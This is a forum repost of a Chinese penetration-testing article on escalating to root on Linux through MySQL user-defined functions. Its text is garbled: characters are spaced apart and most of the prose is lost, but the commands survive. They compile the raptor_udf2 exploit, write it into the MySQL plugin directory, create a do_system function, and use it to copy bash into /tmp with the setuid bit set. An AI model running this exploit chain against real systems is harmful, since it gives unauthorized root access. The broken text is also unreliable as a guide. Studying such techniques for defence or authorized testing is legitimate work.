搜索

[29136] 2021-08-31_【渗透测试】Linux权限提升——利用用户定义的函数

文档创建者:s7ckTeam
浏览次数:79
最后更新:2025-01-19
2021-08-31_【渗透测试】Linux权限提升——利用用户定义的函数 L i n u x   O t s   2 0 2 1 - 0 8 - 3 1 O t s M y S Q L     M y S Q L     r o o t   访   M y S Q L     M y S Q L     r o o t   使   M y S Q L     M y S Q L     M y S Q L     r o o t   r o o t   访   M y S Q L   W e b   使   r o o t     t o o r   E x p l o i t   D B   p s   a u x   |   g r e p   m y s q l m y s q l   - V m y s q l   - u   r o o t   - p   - e   ' s e l e c t   @ @ v e r s i o n ; ' g c c   - g   - c   1 5 1 8 . c   - o   r a p t o r _ u d f 2 . o   - f P I C
使   P y t h o n   S i m p l e   H T T P   S e r v e r     W g e t     M y S Q L   使   / u s r / l i b / m y s q l / p l u g i n   d o _ s y s t e m g c c   - g   - s h a r e d   - W l , - s o n a m e , r a p t o r _ u d f 2 . s o   - o   r a p t o r _ u d f 2 . s o   r a p t o r _ u d f 2 . o   - l c u s e   m y s q l ; c r e a t e   t a b l e   f o o ( l i n e   b l o b ) ; i n s e r t   i n t o   f o o   v a l u e s ( l o a d _ f i l e ( ' < p a t h   t o   U D F   f i l e > ' ) ) ; s e l e c t   *   f r o m   f o o   i n t o   d u m p f i l e   ' / u s r / l i b / m y s q l / p l u g i n / u d f _ f i l e _ n a m e . s o ' ; c r e a t e   f u n c t i o n   d o _ s y s t e m   r e t u r n s   i n t e g e r   s o n a m e   ' u d f _ f i l e _ n a m e . s o ' ;
  M y S Q L   使 使   M y S Q L   使 s e l e c t   d o _ s y s t e m   r o o t   使   / b i n / b a s h     S U I D   使   - p   r o o t   访 s h o w   v a r i a b l e s   l i k e   ' % p l u g i n % ' ; s e l e c t   d o _ s y s t e m ( ' < c o m m a n d > ' ) ; s e l e c t   d o _ s y s t e m ( ' c p   / b i n / b a s h   / t m p / s t e f ;   c h m o d   + x s   / t m p / s t e f ' ) ;
  M y S Q L   使   B a s h     M y S Q L   p l u g i n s   M e t a s p l o i t     S Q L M a p     L i n u x     W i n d o w s   M y S Q L     M y S Q L  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理